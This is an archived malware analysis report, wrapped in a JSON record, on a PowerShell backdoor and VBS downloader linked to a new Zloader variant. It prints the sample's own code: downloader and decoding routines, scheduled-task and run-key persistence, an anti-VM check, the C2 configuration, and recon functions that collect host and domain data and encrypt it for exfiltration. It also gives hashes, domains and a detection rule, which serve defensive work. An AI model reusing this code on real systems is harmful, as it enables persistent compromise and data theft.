{
	"id": "1e02bf92-7736-494a-8e5a-95f555eb1f43",
	"created_at": "2026-04-06T00:09:54.201021Z",
	"updated_at": "2026-04-10T03:21:37.156925Z",
	"deleted_at": null,
	"sha1_hash": "09f2cdc36463d405924a01dc49a1d6d018bf38fa",
	"title": "Unknown powershell backdoor with ties to new Zloader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 108033,
	"plain_text": "Unknown powershell backdoor with ties to new Zloader\r\nBy Jason Reaves\r\nPublished: 2024-07-29 · Archived: 2026-04-05 12:57:21 UTC\r\nBy: Jason Reaves and Joshua Platt\r\nRecently, while investigating a new variant[1] of Zloader/SilentNight[2], an unknown Powershell backdoor and\r\nVBS downloader was uncovered. The malware was potentially utilized alongside the new Zloader variant, which\r\nCISA publicly linked to BlackBasta[3]. The Powershell backdoor appears to have been constructed to further\r\naccess via recon activity and to deploy other malware samples including Zloader.\r\nTechnical Details\r\nThe initial file we set about analyzing is listed below.\r\nCompilation Timestamp 2023-05-30 10:31:14 UTC\r\nMD5: e447362fb2686062a3dfc921c10dd6c7\r\nSHA-1: 544599ef72cbd97fe50e4169c8401270ff3b917b\r\nSHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb\r\nAfter analyzing the file, 2 more files were found matching the same characteristics:\r\nCompilation Timestamp 2023-05-30 10:31:17 UTC\r\nMD5: 41563d1f34b704728988a53833577076\r\nSHA-1: 72a572ce8247f80946e71f637c3403228543d9a3\r\nSHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b\r\nCompilation Timestamp 2023–05–29 16:24:50 UTC\r\nMD5: 83aa432c43f01541e4f1e2f995940e69\r\nSHA-1: 931b6fd3e7ee5631fbc583640805809d9f2acc58\r\nSHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e\r\nThe files are .NET packed by AgilDotNet[4]. After painfully analyzing the initial binary, the backdoor\r\nfunctionality was unpacked and decrypted. An unpacked version of the powershell executor is on VT also:\r\nCompilation Timestamp 2023-07-04 21:13:57 UTC\r\nMD5: bd76d387b9bf9e30b502e367f035b8db\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 1 of 7\n\nSHA-1: 67f36d508ab75441975de3e6325b023401a37d44\r\nSHA-256: 1cc0460c2eee5a0a6e80e1f7b7b332726946a9f667c76539d10dfc1cc53c63f6\r\nThe powershell script includes a hardcoded filename, for example:\r\n$myfilename = \"Uninstall_Ahl\";\r\nIf the checks fail, the malware will move itself and uninstall all the previous data. This could make updating the\r\nbots relatively easy. If the checks succeed, then it will setup a number of variables in the script:\r\n$mymd5 = (Get-FileHash -Path (Get-Process -Id $PID).Path -Algorithm MD5 | Select-Object -ExpandPrope\r\n$mypath = (Get-Process -Id $PID).Path;\r\n$programDataFolder = Join-Path $env:ProgramData \"IncrediBuild\";\r\n$installpath = Join-Path $programDataFolder ($myfilename + \".exe\");\r\n$filevb = Join-Path $programDataFolder ($myfilename + \".vbs\");\r\n$tsksh = (New-Guid).Guid;\r\nThe following VB downloader is written to disk alongside the executable file mentioned above. The downloader\r\ncontains a double base64 encoded URL that is decrypted to reveal the downloader site.\r\n$vbContent = @\"\r\n Set WshShell = CreateObject(\"WScript.Shell\")\r\n Set objWMIService = GetObject(\"winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2\")\r\n Set cPrs = objWMIService.ExecQuery(\"Select * from Win32_Process Where Name = 'Uninstall_Ahl.exe\r\n Function bb4(mumu)\r\n Dim oDecoder, oStream\r\n Set oDecoder = CreateObject(\"\r\nMSXML2.DOMDocument\").createElement(\"mumu\")\r\n oDecoder.dataType = \"bin.base64\"\r\n oDecoder.Text = mumu\r\n Set oStream = CreateObject(\"\r\nADODB.Stream\")\r\n oStream.Open\r\n oStream.Type = 1 'adTypeBinary\r\n oStream.Write oDecoder.nodeTypedValue\r\n oStream.Position = 0\r\n oStream.Type = 2 'adTypeText\r\n oStream.Charset = \"us-ascii\"\r\n bb4 = oStream.ReadText\r\n oStream.Close\r\n End Function\r\n dStr = bb4(bb4(\"\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 2 of 7\n\n\u003credacted\u003e\"))\r\n If cPrs.Count = 0 Then\r\n WshShell.Run dStr, 0, True\r\n End If\r\n Set WshShell = Nothing\r\n Set objWMIService = Nothing\r\n Set cPrs = Nothing\r\n\"\r\n@;\r\nAfterwards, it executes a hardcoded curl command, which will download and execute files from the encoded\r\nURL.\r\nPress enter or click to view image in full size\r\nA check is performed if it is already running before performing the above command. Tasks are installed based on a\r\nhardcoded name with a random GUID:\r\n$filevb = Join-Path $programDataFolder ($myfilename + \".vbs\");\r\n $tsksh = (New-Guid).Guid;\r\n$actionts = New-ScheduledTaskAction -Execute $filevb;\r\n$triggerts = New-ScheduledTaskTrigger -Daily -At 12am;\r\nRegister-ScheduledTask -Action $actionts -Trigger $triggerts -TaskName \"UpdateTaskMachine{$tsksh}\";\r\nThe script then sets up a run key:\r\n$myfilename = \"Uninstall_Ahl\";\r\n$installpath = Join-Path $programDataFolder ($myfilename + \".exe\");\r\n$regPath = \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\";\r\n$regKeyName = [System.IO.Path]::GetFileNameWithoutExtension($installPath);\r\nSet-ItemProperty -Path $regPath -Name $regKeyName -Value \"`\"${installPath}`\"\";\r\nAdmin check:\r\nfunction CheckAdmin(){\r\n$isAdm = \"User\";\r\nif ($null -ne (whoami /groups /fo csv | ConvertFrom-Csv | Where-Object { $_.SID -eq \"S-1-5-32-544\" }\r\n $isAdm = \"Admin\"\r\n }\r\nreturn $isAdm\r\n}\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 3 of 7\n\nInternet connectivity check:\r\n$CheckInternet = DomainIpAddressRecord(\"google.com\");\r\nwhile (!$CheckInternet) {\r\n Start-Sleep -Seconds (600);\r\n }\r\nInside the script resides some heavily obfuscated sections that look very similar to JSF**k[5] but for powershell\r\ncode. The obfuscated code wrapper appeared to overlap a powershell backdoor spread in May of 2023[6]. We\r\nextracted the code blobs and after careful analysis some structure began to appear.\r\n('@@@'|% {${]} =+$() }{${!}=${]}} {${%=}=++ ${]} } {${(} = ( ${]} = ${]}+${%=}) } { $\r\n...snip...\r\n ${[';}${%=}${!}${~!(}+${[';}${%=}${!}${%=} +${[';}${)./}${(} + ${[';}${)./}${[} + ${[';}${+=}${\r\nIn reality, there are two things going on. One is the evaluation of the obfuscated data between the | symbols, which\r\ncontain two main blocks of functionality. The other is for building needed values in order to re-assemble and\r\nmanipulate the content. After the main block is executed, the result is piped out to ‘.’ for detonation. Modifying\r\nthe script to replace the evaluation statement allows us to test this:\r\n| Write-Output\r\nAlternatively, we can also leverage Box-PS[7]. This leads to a much easier obfuscation to get through. As we get\r\ninto the layers, the first blob of code is an anti VM check:\r\n$computerSystem = Get-WmiObject Win32_ComputerSystem;\r\n$model = $computerSystem.Model;\r\nif ($model -like '*VirtualBox*' or $model -like '*Virtual*'){exit}\r\nDecoding the rest of the layers we see the bot config:\r\n$botnet = \"Amazon\";\r\n$botver = \"0.1\";\r\n$knocktime = 300;\r\n$uuid = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n$admin_url = \"hxxps://aerofly.]live/api/v3/\";\r\n$passkey = \"12345678901234567890123456789012\";\r\n$iv = \"\u00269*zS7LY%ZN1thfI\";\r\n$secureKey = \"56e620b9e45120dfd1c534aee0b10c9eb3fc3948e7564cda3313a2ed456706e8\"\r\nNext block involves the building of the information the bot will send off to the C2 along with response to\r\ncommands issued:\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 4 of 7\n\nfunction base64header($myVar) {\r\n try {\r\n $myVariable = @();\r\n $myVariable += \"BOTID:$env:COMPUTERNAME\" + \"_\" + (Get-CimInstance Win32_ComputerSystemProduct\r\n $myVariable += \"UUID:\" + $uuid;\r\n $myVariable += \"Username:$env:USERNAME\";\r\n $myVariable += \"Botnet:\" + $botnet;\r\n $myVariable += \"Version:\" + $botver;\r\n $myVariable += \"FileName:\" + (Get-Process -Id $PID).Name;\r\n $myVariable += \"URL:\" + $script: url;\r\n $myVariable += \"MD5:\" + (Get-FileHash -Path(Get-Process -Id $PID).Path -Algorithm MD5 | Selec\r\n $myVariable += $myVar;\r\n $myVariableString = $myVariable | Out-String;\r\n $bytes = [System.Text.Encoding]::UTF8.GetBytes($myVariableString);\r\n $base64EncodedString = [System.Convert]::ToBase64String($bytes);\r\n $TempData = @ {\r\n \"infohead\" = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n \"data64\" = $base64EncodedString;\r\n } | ConvertTo - Json;\r\n return EncryptString $TempData;\r\n } catch {\r\n Write - Host \"Error in base64header\";\r\n return $null;\r\n }\r\n}\r\nEncryption mentioned here is performed using AES in CBC mode:\r\nFunction DecryptString {\r\n Param([string] $encryptedStr) try {\r\n $enc = [System.Text.Encoding]::UTF8;\r\n $AES = New - Object System.Security.Cryptography.AESManaged;\r\n $AES.Mode = [System.Sec\r\n urity.Cryptography.CipherMode\r\n ]::CBC;\r\n $AES.BlockSize = 128;\r\n $AES.KeySize = 256;\r\n $AES.IV = $e\r\nThe below function performs recon, gathers additional machine information and encodes all the data that will be\r\nsent to the C2 during its initial run:\r\nfunction PCInfoBytes() {\r\n $myVariable = @();\r\n $myVariable += \"BOTID:$env:COMPUTERNAME\" + \"_\" + (Get-CimInstance Win32_ComputerSystemProduct).UU\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 5 of 7\n\n$myVariable += \"Hostname:$env:COMPUTERNAME\";\r\n $myVariable += \"UUID:\" + (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n $myVariable += \"Botnet:\" + \"$botnet\";\r\n $myVariable += \"Version:\" + \"0.1\";\r\n $myVariable += \"FileName:\" + (Get-Process -Id $PID).Name;\r\n $myVariable += \"UserType:\" + (CheckAdmin);\r\n $myVariable += \"AntiVirus:\" + (Get-WmiObject -Namespace \"root\\\\SecurityCenter2\" - Class \"Antiviru\r\n $myVariable += \"OS:\" + (Get-WmiObject -class Win32_OperatingSystem).Caption;\r\n $myVariable += \"CPU:\" + (Get-WmiObject -Class Win32_Processor).Name;\r\n $myVariable += \"Cores:\" + (Get-WmiObject -Class Win32_Processor).NumberOfCores;\r\n $myVariable += \"RAM:\" + [Math]::Round((Get-WmiObject -Class Win32_ComputerSystem).TotalPhysicalMe\r\n $myVariable += \"Video:\" + (Get-WmiObject Win32_VideoController).Caption;\r\n $myVariable += \"Monitors:\" + (Get-WmiObject WmiMonitorID -Namespace root\\\\ wmi -ErrorAction Silen\r\n $myVariable += \"URL:\" + $script: url;\r\n $myVariable += \"MD5:\" + (Get-FileHash -Path(Get-Process -Id $PID).Path -Algorithm MD5 | Select-Ob\r\n $myVariable += get-wmiobject Win32_ComputerSystem;\r\n $myVariable += get-wmiobject Win32_BIOS;\r\n $myVariable += ipconfig /all;\r\n $myVariable += net config workstation;\r\n $myVariable += net view /all;\r\n $myVariable += net view /all /domain;\r\n $myVariable += nltest /domain_trusts;\r\n $myVariable += nltest /domain_trusts /all_trusts;\r\n $myVariable += \"`n\";\r\n $myVariable += \"Installed Programs`n-------------------------------------------------------------\r\n $myVariable += Get-Package | Where-Object {\r\n $_.ProviderName -ne \"msu\"\r\n } | Select-Object Name, Version | Sort-Object Name | Out-String;\r\n $myVariable += Get-Hotfix | Select-Object HotFixID, InstalledOn | Out-String;\r\n $myVariableString = $myVariable | Out-String;\r\n $bytes = [System.Text.Encoding]::UTF8.GetBytes($myVariableString);\r\n $base64EncodedString = [System.Convert]::ToBase64String($bytes);\r\n $TempData = @ {\r\n \"infohead\" = (Get-CimInstance Win32_ComputerSystemProduct).UUID;\r\n \"data64\" = $base64EncodedString;\r\n } | ConvertTo-Json;\r\n return EncryptString $TempData;\r\n}\r\nINDICATOR OF COMPROMISE (IOCs)\r\nSHA-256: 66a69d992a82681ee1d971cc2b810dd4b58c3cfd8b4506b3d62fe1e7421fb90b\r\nSHA-256: b513c6940ed32766e1ac544fc547b1cb53bc95eced5b5bcc140d7c6dce377afb\r\nSHA-256: 82f33adfecd67735874cdc9c2bfd27d4b5b904c828d861544c249798a3e65e7e\r\nSHA-256: 1cc0460c2eee5a0a6e80e1f7b7b332726946a9f667c76539d10dfc1cc53c63f6\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 6 of 7\n\nmsfw[.store\r\nmamore[.live\r\njesko[.live\r\ndison[.live\r\nwesco[.live\r\nmafw[.store\r\nmfsc.]live\r\naerofly.]live\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"PshellBkdr C2 traffic known Bearer\"; content:\"POS\r\nReferences\r\n[1] https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\n[2] https://www.deepwatch.com/blog/guess-whos-back-zloaders-back-back-again/\r\n[3] https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a\r\n[4] https://secureteam.net/acode-features-detailed\r\n[5] https://jsf**k.com/\r\n[6] https://cert.pl/en/posts/2023/05/powerdash-malspam/\r\n[7] https://github.com/ConnorShride/box-ps\r\nSource: https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nhttps://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850"
	],
	"report_names": [
		"unknown-powershell-backdoor-with-ties-to-new-zloader-88ca51d38850"
	],
	"threat_actors": [],
	"ts_created_at": 1775434194,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.pdf",
		"text": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.txt",
		"img": "https://archive.orkl.eu/09f2cdc36463d405924a01dc49a1d6d018bf38fa.jpg"
	}
}